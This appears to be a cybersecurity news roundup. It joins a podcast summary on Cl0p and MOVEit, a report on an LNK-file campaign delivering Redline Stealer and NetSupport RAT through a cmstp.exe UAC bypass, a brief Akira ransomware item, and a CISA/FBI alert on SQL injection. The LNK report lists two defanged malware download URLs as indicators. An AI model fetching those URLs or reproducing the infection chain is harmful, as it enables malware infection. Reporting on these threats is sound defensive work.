The Cl0p gang moves its way into US government systems. It’ll take multiple showers to rinse out Shampoo malware. Hybrid war update. Arrests and indictments.
The US Government discloses exploitations of MOVEit vulnerabilities, and the Department of Energy is targeted by the Cl0p gang. CISA releases an updated advisory for Telerik vulnerabilities affecting Government servers. Shampoo malware emerges with multiple persistence mechanisms. How the IT Army of Ukraine can exemplify a cyber auxiliary. Russophone gamers are being targeted with ransomware. An alleged LockBit operator has been arrested. The FBI’s Deputy Assistant Director for cyber Cynthia Kaiser joins us with cybercriminal trends and recent successes. Our guest is Will Markow from Lightcast, speaking with Simone Petrella about data-driven strategic workforce decisions. And a federal grand jury indicts the alleged Discord Papers leaker. Read More
Hackers Use Weaponized LNK Files to Exploit Microsoft Connection Manager Profile
Threat actors have shifted from using malicious macros to malicious LNK files for initial access. This is due to Microsoft’s announcement in 2022 to disable macros by default for Office documents downloaded from unknown sources or the internet.
The current attack vector uses the Microsoft Connection Manager Profile, which runs the process cmstp.exe for proxying the execution of malicious payloads.
This current campaign was found to be similar to the Invicta stealer infection method, but the infection chain seems to be varying. This concludes that threat actors have changed their TTPs (Tactics, Techniques, and Procedures).
In most cases, the LNK file containing the remote VBScript infection is distributed via spam emails disguised as legitimate-looking attachments with file extensions like ZIP or ISO.
LNK Files to Exploit Microsoft Connection Manager Profile
Following the download of a ZIP file embedded with the LNK file which is disguised as a PDF file. This initiates a remote command execution of a .hta file on a remote server.
Once this .hta file gets executed, it initiates the download of the VBScript that is extremely obfuscated. This VBScript, after execution, de-obfuscates the PowerShell loader, resulting in the activation of a PowerShell downloader.
Malicious LNK file (Source: Cyble)
Infection Chain (Source: Cyble)
This PowerShell downloader fetches the malware files from two URLs namely,
hxxp[:]//a0840501.xsph[.]ru/Inv.pdf
hxxp[:]//a0840501.xsph[.]ru/71iqujprzsp4w[.]exe
These files are then stored in the AppDataRoaming directory along with their original names. The files are one PDF and one EXE file (Redline stealer library). The PowerShell downloader uses cmstp.exe for UAC (User Access Control) bypass.
Weaponized LNK FilesUncovered
As per the report submitted to Cyber Security News, the malware payloads, Weaponized LNK Files were discovered to be Blank Grabber, Redline Stealer, and NetSupport RAT.
Blank Grabber is a Python-based open-source stealer that contains a GUI builder and can be used to generate stealer payloads easily. It also provides the option to customize the stealer like custom icon, UAC bypass, and persistence during startup.
Redline Stealer is sold on cyberforums and is one of the most prominent infostealers in cyberspace. This can be used to gain unauthorized access to sensitive information like passwords, login credentials, autofill data, and credit card details.
NetSupport RAT is a commercial RAT used for legitimate remote access to users by administrators but is being misused by threat actors to gain unauthorized access.
Furthermore, a complete report has been published by Cyble researchers which provides detailed information about the obfuscation, attack vector, YARA rules, and other details.
Linux version of Akira ransomware targets VMware ESXi servers
The Akira ransomware operation uses a Linux encryptor to encrypt VMware ESXi virtual machines in double-extortion attacks against companies worldwide. […] Read More
CISA and the FBI released the Secure by Design Alert to address SQL injection vulnerabilities in software that affect thousands of organizations.
A persistent class of defects in commercial software solutions is SQL injection, or SQLi, vulnerabilities.
Even though SQL vulnerabilities have been known about and documented for a decade now, and there are workable mitigations available, software manufacturers have persisted in creating products that have this flaw, endangering a large number of users.
Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.
:
The problem of vulnerability fatigue today
Difference between CVSS-specific vulnerability vs risk-based vulnerability
Evaluating vulnerabilities based on the business impact/risk
Automation to reduce alert fatigue and enhance security posture significantly
AcuRisQ, which helps you to quantify risk accurately:
Secure by Design refers to how manufacturers design and create products to prevent malicious cyber actors from exploiting flaws.
Customers’ burden with cybersecurity and public risk is decreased by incorporating this mitigation from the start, especially in the design phase and continuing through development, release, and updates.
“SQL vulnerabilities (such as CWE-89) are still a prevalent class of vulnerability. CWE-89 is on top 25 lists for both the most dangerous and stubborn software weaknesses in 2023”, CISA and FBI said in the report.
Specifics Of The SQL Injection Vulnerabilities
When user input is directly injected into a SQL command, an SQL injection vulnerability occurs, enabling threat actors to run arbitrary queries.
Software developers’ neglect of security best practices leads to the combination of user-supplied data with database queries, which is the root cause of SQLi vulnerabilities.
A successful SQLi exploitation can have disastrous consequences since it compromises the availability, confidentiality, and integrity of a database and the data within it.
In particular, malicious cyber actors may be able to take sensitive data, and modify, remove, or render data in a database unavailable due to SQLi vulnerabilities.
How To Eliminate SQL Injection Vulnerabilities
To avoid this kind of vulnerability, developers should utilize prepared statements in parameterized queries to isolate SQL code from user-supplied data while designing and developing software products.
Software developers should mandate the usage of parametrized queries in all of their applications to systematically eliminate SQLi vulnerabilities.
“CISA and the FBI urge senior executives at technology manufacturers to mount a formal review of their code to determine its susceptibility to SQLi compromises and encourage all technology customers to ask their vendors whether they have conducted such a review”, reads the joint alert.
Three Essential Principles For Developing Software That Is Secure By Design
Take Ownership Of Customer Security Outcomes
It is recommended that software producers implement the common practice of using prepared statements with parameterized queries in software development
Senior executives at software producers must accept responsibility for their customers’ security, beginning with formal code reviews to assess vulnerabilities.
Embrace Radical Transparency And Accountability
Software makers ought to monitor the types of vulnerabilities linked to their products and notify customers about them through the CVE initiative. Manufacturers have to make sure that all of the information in their CVE records is accurate.
Build Organizational Structure And Leadership To Achieve These Goals
As a declared company objective, leaders should create the proper incentive programs and make the necessary investments to support security.
Manufacturers are urged by CISA and the FBI to release their own secure by design roadmap as evidence that they are strategically reconsidering their role in ensuring the safety of their consumers, rather than just putting in place tactical safeguards.
Stay updated on Cybersecurity news, Whitepapers, and Infographics. Follow us on LinkedIn & Twitter.